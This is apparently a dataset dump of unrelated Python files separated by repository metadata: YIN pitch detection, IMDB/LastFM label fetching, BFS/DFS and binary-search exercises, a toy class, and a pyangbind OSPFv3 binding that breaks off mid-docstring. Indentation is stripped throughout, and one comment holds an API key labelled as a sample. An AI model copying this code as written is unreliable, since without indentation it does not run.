# according to (7) in the Yin paper
out = powerTerms[0] + powerTerms - 2 * correlation[outSize - 1:frameSize - 1]
return out
@nb.jit(nb.float64[:](nb.float64[:]), cache=True)
def cumulativeDifference(x):
out = x.copy()
nOut = len(out)
out[0] = 1.0
sum = 0.0
for i in range(1, nOut):
sum += out[i]
if(sum == 0.0):
out[i] = 1
else:
out[i] *= i / sum
return out
def findValleys(x, minFreq, maxFreq, sr, threshold = 0.5, step = 0.01):
ret = []
begin = max(1, int(sr / maxFreq))
end = min(len(x) - 1, int(np.ceil(sr / minFreq)))
for i in range(begin, end):
prev = x[i - 1]
curr = x[i]
next = x[i + 1]
if(prev > curr and next > curr and curr < threshold):
threshold = curr - step
ret.append(i)
return ret
def doPrefilter(x, maxFreq, sr):
filterOrder = int(2048 * sr / 44100.0)
if(filterOrder % 2 == 0):
filterOrder += 1
f = sp.firwin(filterOrder, max(maxFreq + 500.0, maxFreq * 3.0), window = "blackman", nyq = sr / 2.0)
halfFilterOrder = filterOrder // 2
x = sp.fftconvolve(x, f)[halfFilterOrder:-halfFilterOrder]
return x
class Processor:
def __init__(self, sr, **kwargs):
self.samprate = float(sr)
self.hopSize = kwargs.get("hopSize", roundUpToPowerOf2(self.samprate * 0.0025))
self.minFreq = kwargs.get("minFreq", 80.0)
self.maxFreq = kwargs.get("maxFreq", 1000.0)
self.windowSize = kwargs.get("windowSize", max(roundUpToPowerOf2(self.samprate / self.minFreq * 2), self.hopSize * 4))
self.prefilter = kwargs.get("prefilter", True)
self.valleyThreshold = kwargs.get("valleyThreshold", 0.5)
self.valleyStep = kwargs.get("valleyStep", 0.01)
def __call__(self, x, removeDC = True):
nX = len(x)
nHop = getNFrame(nX, self.hopSize)
if(removeDC):
x = simpleDCRemove(x)
if(self.prefilter):
x = doPrefilter(x, self.maxFreq, self.samprate)
out = np.zeros(nHop, dtype = np.float64)
for iHop in range(nHop):
frame = getFrame(x, iHop * self.hopSize, self.windowSize)
buff = difference(frame)
buff = cumulativeDifference(buff)
valleyIndexList = findValleys(buff, self.minFreq, self.maxFreq, self.samprate, threshold = self.valleyThreshold, step = self.valleyStep)
out[iHop] = self.samprate / parabolicInterpolation(buff, valleyIndexList[-1], val = False) if(valleyIndexList) else 0.0
return out
|
[
"dorazzsoft@gmail.com"
] |
dorazzsoft@gmail.com
|
ebc21d4712901696d0412661c94a1649a05d05f9
|
bae0de8220dcfda0efd6490d1516353d0399de69
|
/dataHandling/itemLabels.py
|
ac3d067a4a19c38826ec2f81bdb0b12935524a13
|
[] |
no_license
|
mkaminskas/beyond_accuracy
|
1be5f49182fd7d1a99b84768c00ac094237a364c
|
96a8bddd882c308bb267ea7d8815c31cd73bc971
|
refs/heads/master
| 2020-04-24T01:31:33.140677
| 2016-08-30T23:32:17
| 2016-08-30T23:32:17
| 66,984,368
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,790
|
py
|
'''
Created on 13 Jan 2015
a module for getting item labels using the external APIs
@author: mkaminskas
'''
import ast
import logging
import operator
import os
import sys
from time import time
from utils import config
req_version = (2,7)
cur_version = sys.version_info
if cur_version >= req_version:
# import musicbrainz2.webservice as ws
# import pylast
import imdb
'''
get IMDB plot keywords for a movie
'''
def _getIMDBDataByTitle(title):
try:
ia = imdb.IMDb()
movie = ia.search_movie(title)[0]
ia.update(movie, 'keywords')
return movie['keywords']
except Exception, e:
print e,': could not get keywords for the movie',title
return []
'''
get the artist names and if needed their tags using the MusicBrainz web service
if tags are found, return top 5 by count (or less if there aren't 5)
'''
def _getMusicBrainzDataByIndex(data_matrix, item_index, tags=False):
pass
#
# item_id = data_matrix.getItemId(item_index)
# if item_id == -1:
# print 'Could not find the id of artist '+str(item_index)
# else:
# # get artist name from MusicBrainz. 1s delay needed to avoid service error
# time.sleep(1)
# q = ws.Query()
# if tags:
# include = ws.ArtistIncludes(tags=True)
# else:
# include = None
#
# try:
# artist = q.getArtistById(item_id, include)
# artist_tags = [(tag.getValue(), tag.getCount()) for tag in artist.getTags()]
# return artist.getName(), sorted(artist_tags, key=operator.itemgetter(1), reverse=True)[:min(len(artist_tags),5)]
#
# except ws.WebServiceError, e:
#
# print 'Could not find the title of artist '+str(item_id)+': '+str(e)
# return None, None
'''
read top LastFM tags for an artist
'''
def _getLastFMDataById(item_id):
pass
#
# time.sleep(1)
#
# API_KEY = "e397a21f9334aaa9233e8d38ea2e6500" # this is a sample key
# network = pylast.LastFMNetwork(api_key=API_KEY)
#
# try:
# artist = network.get_artist_by_mbid(item_id)
# topItems = artist.get_top_tags(limit=10)
# if topItems:
# return artist.get_name(), [topItem.item.get_name().lower() for topItem in topItems]
# else:
# return None, None
# except Exception, e:
# print e
# return None, None
'''
write the file of movies and their content labels (genres + IMDB keywords)
'''
def _generateMovieLabels(dataset='old'):
'''
dataset = old | new | big
although 'new' and 'big' setups need updating the IMDB parser
'''
t = time()
if dataset == 'old':
logging.info('generating labels for the 1M Movielens data...')
source_data_path = config.MOVIELENS_DATA
destination_data_path = config.MOVIE_FILE_IMDB
data_separator = '::'
elif dataset == 'new':
logging.info('generating labels for the latest Movielens data...')
source_data_path = config.MOVIELENS_DATA_NEW
destination_data_path = config.MOVIE_FILE_IMDB
data_separator = ','
elif dataset == 'big':
logging.info('generating labels for the 20M Movielens data...')
source_data_path = ''
destination_data_path = ''
data_separator = ','
else:
raise ValueError('Wrong type of dataset entered.')
processed_movies = set()
# before reading the data, need to construct a list of already processed artists
with open(destination_data_path,'rb') as movies:
for line in movies:
data = line.split('::')
processed_movies.add(data[0])
with open(source_data_path, 'rb') as f:
with open(destination_data_path,'a') as movie_file:
for line in f:
data = line.split(data_separator)
movie_id = data[0]
if (movie_id not in processed_movies):
movie_title = data[1].decode('utf8')
movie_genres = data[2].rstrip().split('|')
movie_keywords = _getIMDBDataByTitle(movie_title)
movie_labels = "|".join(movie_genres + movie_keywords)
movie_file.write(movie_id+'::'+movie_title.encode('utf8')+'::'+movie_labels.encode('utf8')+'\n')
processed_movies.add(movie_id)
print 'done with movie',movie_title
print 'number of unique movies:',len(processed_movies)
print("movie data generated in %0.3fs." % (time() - t))
'''
write the file of unique artists and their LastFM tags
the processed_artists set needed to make this method re-runnable
'''
def _generateArtistLabels():
t = time()
unidentified_artists = set()
processed_artists = set()
# before reading the data, need to construct a list of already processed artists
with open(config.ARTIST_FILE_LASTFM,'rb') as artists:
for line in artists:
data = line.split('::')
processed_artists.add(data[0])
with open(config.LASTFM_DATA, 'rb') as f:
with open(config.ARTIST_FILE_LASTFM,'a') as artist_file:
for line in f:
data = line.split('\t')
artist_id = data[2]
if artist_id != '':
# check if the artist is not yet processed
if (artist_id not in processed_artists) and (artist_id not in unidentified_artists):
artist_name, artist_tags = _getLastFMDataById(artist_id)
# only record artists that have at least 3 tags
if artist_name and len(artist_tags) >= 3:
labels = "|".join(artist_tags)
artist_file.write(artist_id+'::'+artist_name.encode('utf8')+'::'+labels.encode('utf8')+'\n')
processed_artists.add(artist_id)
else:
unidentified_artists.add(artist_id)
print 'number of unique artists:',len(processed_artists)
print("artist data generated in %0.3fs." % (time() - t))
def getMovieSynopsisForSurvey(iteration):
'''
get the genres and plot synopsis for movies used in the user study
'''
movies = {}
# with open(os.path.join(config.PACKAGE_DIR, '../survey/mov.txt'),'rb') as f:
# movies = ast.literal_eval(f.readline())
with open(os.path.join(config.PACKAGE_DIR, '../survey/survey'+str(iteration)+'.dat'),'rb') as survey_file:
for line in survey_file:
if '"' not in line:
continue
titles = line.split('"')[1::2]
for title in titles:
if title not in movies:
try:
ia = imdb.IMDb()
movie = ia.search_movie(title)[0]
movie = ia.get_movie(movie.movieID)
movies[title] = {'genres':movie.get('genres'), 'plot':movie.get('plot outline')}
print 'processed',len(movies),'movies'
except Exception, e:
print 'could not get the data for movie',title
print e
# writing the sorted dict to a file
with open(os.path.join(config.PACKAGE_DIR, '../survey/movies'+str(iteration)+'.dat'),'wb') as movie_file:
for key in sorted(movies):
if movies[key]['genres'] is None:
genres = 'None'
else:
genres = " | ".join(movies[key]['genres'])
if movies[key]['plot'] is None:
plot = 'None'
else:
plot = movies[key]['plot']
movie_file.write(key+' | '+genres.encode('utf8')+'\nsynopsis: '+plot+'\n-------------------------\n')
if __name__ == "__main__":
# _generateMovieLabels()
# _generateArtistLabels()
for i in range(1,6):
getMovieSynopsisForSurvey(i)
|
[
"marius.kaminskas@gmail.com"
] |
marius.kaminskas@gmail.com
|
dd5cc1124326b728e2cc2c981f35498c20b46681
|
6ecff67d6103ddbd787f78c35182722b83b8a37e
|
/백준/Python/카테고리/BFS/1260(DFS와 BFS).py
|
681e7643a027fa4f36297f7963bd89521f5ead1b
|
[] |
no_license
|
jsungmin6/Algorithm
|
9ef2339aa00921e7df756a8dff569954a008c118
|
bc1ea9de9f7ba3f1aa6616ebef8719540d72e0bf
|
refs/heads/master
| 2023-05-27T06:24:16.123307
| 2021-06-11T09:22:21
| 2021-06-11T09:22:21
| 259,299,624
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,090
|
py
|
from collections import deque
N,M,V = map(int,input().split())
graph=[[] for i in range(N+1)]
for _ in range(M):
x,y = map(int,input().split())
graph[x].append(y)
graph[y].append(x)
def bfs(V):
visited=[-1]*(N+1)
q=deque([V])
answer=[]
while q:
node = q.popleft()
if visited[node] == 1:
continue
answer.append(node)
visited[node] = 1
next_graph = sorted(graph[node])
for i in next_graph:
if visited[i] == -1:
q.append(i)
return answer
def dfs(V):
visited=[-1]*(N+1)
need_visited = [V]
answer=[]
while need_visited:
node = need_visited.pop()
if visited[node] == 1:
continue
answer.append(node)
visited[node] = 1
next_graph = sorted(graph[node],reverse=True)
for i in next_graph:
if visited[i] == -1:
need_visited.append(i)
return answer
for i in dfs(V):
print(i,end=' ')
print()
for i in bfs(V):
print(i,end=' ')
|
[
"jsungmin506@gmail.com"
] |
jsungmin506@gmail.com
|
63402bccbc8601342eea789d488111371a150ffe
|
3faf4b9fb76145b2326446bc6bc190a5712b3b62
|
/Algorithms/0704 Binary Search.py
|
8676c3a62d7bcdb529d9fb70400f668484d86646
|
[] |
no_license
|
cravo123/LeetCode
|
b93c18f3e4ca01ea55f4fdebceca76ccf664e55e
|
4c1288c99f78823c7c3bac0ceedd532e64af1258
|
refs/heads/master
| 2021-07-12T11:10:26.987657
| 2020-06-02T12:24:29
| 2020-06-02T12:24:29
| 152,670,206
| 6
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 948
|
py
|
# Solution 1, binary search
# There are several implementation of binary search.
# But the key point is m = (i + j) // 2 will equal to i if j = i + 1
# so we cannot set i = m, otherwise it will be infinite loop.
class Solution:
def search(self, nums: 'List[int]', target: 'int') -> 'int':
i, j = 0, len(nums) - 1
while i < j:
m = (i + j) // 2
if nums[m] < target:
i = m + 1 # gotcha
else:
j = m
return i if nums[i] == target else -1
# Solution 1.1, another Binary Search implementation
class Solution:
def search(self, nums: List[int], target: int) -> int:
i, j = 0, len(nums) - 1
while i <= j:
m = (i + j) // 2
if nums[m] < target:
i = m + 1
elif nums[m] > target:
j = m - 1
else:
return m
return -1
|
[
"cc3630@columbia.edu"
] |
cc3630@columbia.edu
|
0b61511b3ce7aa503737305f9c1f8641e0d4e1cd
|
b25a1553616815d98eb89dc9d99c9d18a922b6a4
|
/OOP.py
|
f1e545ab45948ffe266529e78a0c13832afe3557
|
[] |
no_license
|
shaltiel16-meet/MEET-YL1
|
bba46ad4a9b6677273b74eaf3358533f9c10935d
|
867203e58f436736118bf458ad2391f6da84fca8
|
refs/heads/master
| 2020-03-27T00:43:27.729888
| 2015-01-25T17:59:21
| 2015-01-25T17:59:21
| 26,919,629
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 497
|
py
|
class Animal:
def __init__ (self, name, age, color, size):
self.name = name
self.age = age
self.color = color
self.size = size
def print_all(self):
print(self.name)
print(self.age)
print(self.color)
print(self.size)
def eat(self, food):
print("The Animal " + self.name + " is eating " + food)
def sleep(self, dream):
print("The Animal " + self.name + " is sleeping for " + str(dream) + " hours")
a = Animal("me", 22, "red", "tiny")
a.print_all()
a.eat("pizza")
a.sleep(2)
|
[
"shaltiel16@meet.mit.edu"
] |
shaltiel16@meet.mit.edu
|
0926160d3b26317b602ba8ef2c6b5fd32b837128
|
5b4264b5ee27aefdc9c25cae4e57d1bbeeef9b91
|
/Code up 100/1037.py
|
6219c86c4ea4b246b40ed42a5767755ef0564205
|
[] |
no_license
|
WinterBlue16/Coding_Test
|
971f04dfad9e6b7cef2be56daf090f4ca19884d4
|
13a201e423667f703cf274476cbe6aa88e0da373
|
refs/heads/master
| 2023-04-07T11:20:16.239647
| 2021-04-05T03:59:07
| 2021-04-05T03:59:07
| 244,624,437
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 78
|
py
|
# 풀이 1
print(chr(int(input())))
# 풀이 2
x = int(input())
print(chr(x))
|
[
"leekh090163@gmail.com"
] |
leekh090163@gmail.com
|
b38b3b1da456bddb39c20619c6c7c34fb4d7c940
|
51f887286aa3bd2c3dbe4c616ad306ce08976441
|
/pybind/nos/v7_2_0/interface/port_channel/ipv6/interface_ospfv3_conf/__init__.py
|
abb6de36910486b150c264492beb3261efbc2737
|
[
"Apache-2.0"
] |
permissive
|
b2220333/pybind
|
a8c06460fd66a97a78c243bf144488eb88d7732a
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
refs/heads/master
| 2020-03-18T09:09:29.574226
| 2018-04-03T20:09:50
| 2018-04-03T20:09:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 48,400
|
py
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import bfd
import authentication
import link_interval_properties
class interface_ospfv3_conf(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-interface - based on the path /interface/port-channel/ipv6/interface-ospfv3-conf. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Open Shortest Path First version 3 (OSPFv3)
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__interface_area','__active','__passive','__bfd','__cost','__instance','__mtu_ignore','__network','__priority','__suppress_linklsa','__authentication','__link_interval_properties',)
_yang_name = 'interface-ospfv3-conf'
_rest_name = 'ospf'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__priority = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface priority'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)
self.__suppress_linklsa = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="suppress-linklsa", rest_name="suppress-linklsa", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Suppress link LSA advertisements'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
self.__network = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'broadcast': {'value': 1}, u'point-to-point': {'value': 2}},), is_leaf=True, yang_name="network", rest_name="network", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface type'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='enumeration', is_config=True)
self.__bfd = YANGDynClass(base=bfd.bfd, is_container='container', presence=False, yang_name="bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set BFD operation mode on this interface'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
self.__mtu_ignore = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mtu-ignore", rest_name="mtu-ignore", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'To disable OSPFv3 MTU mismatch detection'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
self.__passive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="passive", rest_name="passive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Passive information'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
self.__instance = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..255']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(0), is_leaf=True, yang_name="instance", rest_name="instance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Instance of OSPFv3 protocol on this interface'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)
self.__authentication = YANGDynClass(base=authentication.authentication, is_container='container', presence=False, yang_name="authentication", rest_name="authentication", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure authentication for the interface', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
self.__cost = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(1), is_leaf=True, yang_name="cost", rest_name="cost", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface cost', u'cli-trim-default': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)
self.__active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="active", rest_name="active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Active information'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
self.__interface_area = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.)(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){2}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5]))|(([0-9])|([1-9]([0-9]{1,8}))|([1]([0-9]{1,9}))|([2][0]([0-9]{1,8}))|([2][1][0-3]([0-9]{1,7}))|([2][1][4][0-6]([0-9]{1,6}))|([2][1][4][7][0-3]([0-9]{1,5}))|([2][1][4][7][4][0-7]([0-9]{1,4}))|([2][1][4][7][4][8][0-2]([0-9]{1,3}))|([2][1][4][7][4][8][3][0-5]([0-9]{1,2}))|([2][1][4][7][4][8][3][6][0-3][0-9])|([2][1][4][7][4][8][3][6][4][0-7]))'}), is_leaf=True, yang_name="interface-area", rest_name="area", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'OSPF area', u'alt-name': u'area'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='ospf:ospf-area-id', is_config=True)
self.__link_interval_properties = YANGDynClass(base=link_interval_properties.link_interval_properties, is_container='container', presence=False, yang_name="link-interval-properties", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'interface', u'port-channel', u'ipv6', u'interface-ospfv3-conf']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'interface', u'Port-channel', u'ipv6', u'ospf']
def _get_interface_area(self):
"""
Getter method for interface_area, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/interface_area (ospf:ospf-area-id)
YANG Description: Assign an OSPF area for the interface
"""
return self.__interface_area
def _set_interface_area(self, v, load=False):
"""
Setter method for interface_area, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/interface_area (ospf:ospf-area-id)
If this variable is read-only (config: false) in the
source YANG file, then _set_interface_area is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_interface_area() directly.
YANG Description: Assign an OSPF area for the interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.)(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){2}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5]))|(([0-9])|([1-9]([0-9]{1,8}))|([1]([0-9]{1,9}))|([2][0]([0-9]{1,8}))|([2][1][0-3]([0-9]{1,7}))|([2][1][4][0-6]([0-9]{1,6}))|([2][1][4][7][0-3]([0-9]{1,5}))|([2][1][4][7][4][0-7]([0-9]{1,4}))|([2][1][4][7][4][8][0-2]([0-9]{1,3}))|([2][1][4][7][4][8][3][0-5]([0-9]{1,2}))|([2][1][4][7][4][8][3][6][0-3][0-9])|([2][1][4][7][4][8][3][6][4][0-7]))'}), is_leaf=True, yang_name="interface-area", rest_name="area", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'OSPF area', u'alt-name': u'area'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='ospf:ospf-area-id', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """interface_area must be of a type compatible with ospf:ospf-area-id""",
'defined-type': "ospf:ospf-area-id",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.)(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){2}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5]))|(([0-9])|([1-9]([0-9]{1,8}))|([1]([0-9]{1,9}))|([2][0]([0-9]{1,8}))|([2][1][0-3]([0-9]{1,7}))|([2][1][4][0-6]([0-9]{1,6}))|([2][1][4][7][0-3]([0-9]{1,5}))|([2][1][4][7][4][0-7]([0-9]{1,4}))|([2][1][4][7][4][8][0-2]([0-9]{1,3}))|([2][1][4][7][4][8][3][0-5]([0-9]{1,2}))|([2][1][4][7][4][8][3][6][0-3][0-9])|([2][1][4][7][4][8][3][6][4][0-7]))'}), is_leaf=True, yang_name="interface-area", rest_name="area", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'OSPF area', u'alt-name': u'area'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='ospf:ospf-area-id', is_config=True)""",
})
self.__interface_area = t
if hasattr(self, '_set'):
self._set()
def _unset_interface_area(self):
self.__interface_area = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.)(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){2}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5]))|(([0-9])|([1-9]([0-9]{1,8}))|([1]([0-9]{1,9}))|([2][0]([0-9]{1,8}))|([2][1][0-3]([0-9]{1,7}))|([2][1][4][0-6]([0-9]{1,6}))|([2][1][4][7][0-3]([0-9]{1,5}))|([2][1][4][7][4][0-7]([0-9]{1,4}))|([2][1][4][7][4][8][0-2]([0-9]{1,3}))|([2][1][4][7][4][8][3][0-5]([0-9]{1,2}))|([2][1][4][7][4][8][3][6][0-3][0-9])|([2][1][4][7][4][8][3][6][4][0-7]))'}), is_leaf=True, yang_name="interface-area", rest_name="area", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'OSPF area', u'alt-name': u'area'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='ospf:ospf-area-id', is_config=True)
def _get_active(self):
"""
Getter method for active, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/active (empty)
YANG Description: When you configure an OSPFv3 interface to be active, that interface sends or receives all the control packets and forms the adjacency. By default, the ipv6 ospf active command is disabled. Whenever you configure the OSPFv3 interfaces to be passive using the default-passive-interface command, all the OSPFv3 interfaces stop sending and receiving control packets. To send and receive packets over specific interfaces, you can use the ipv6 ospf active command.
"""
return self.__active
def _set_active(self, v, load=False):
"""
Setter method for active, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/active (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_active is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_active() directly.
YANG Description: When you configure an OSPFv3 interface to be active, that interface sends or receives all the control packets and forms the adjacency. By default, the ipv6 ospf active command is disabled. Whenever you configure the OSPFv3 interfaces to be passive using the default-passive-interface command, all the OSPFv3 interfaces stop sending and receiving control packets. To send and receive packets over specific interfaces, you can use the ipv6 ospf active command.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="active", rest_name="active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Active information'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """active must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="active", rest_name="active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Active information'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)""",
})
self.__active = t
if hasattr(self, '_set'):
self._set()
def _unset_active(self):
self.__active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="active", rest_name="active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Active information'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
def _get_passive(self):
"""
Getter method for passive, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/passive (empty)
YANG Description: When you configure an OSPF interface to be passive, that interface does not send or receive OSPF route updates. This option affects all IPv6 subnets configured on the interface.By default, all OSPF interfaces are active and thus can send and receive OSPF route information. Since a passive interface does not send or receive route information, the interface is in effect a stub network.
"""
return self.__passive
def _set_passive(self, v, load=False):
"""
Setter method for passive, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/passive (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_passive is considered as a private
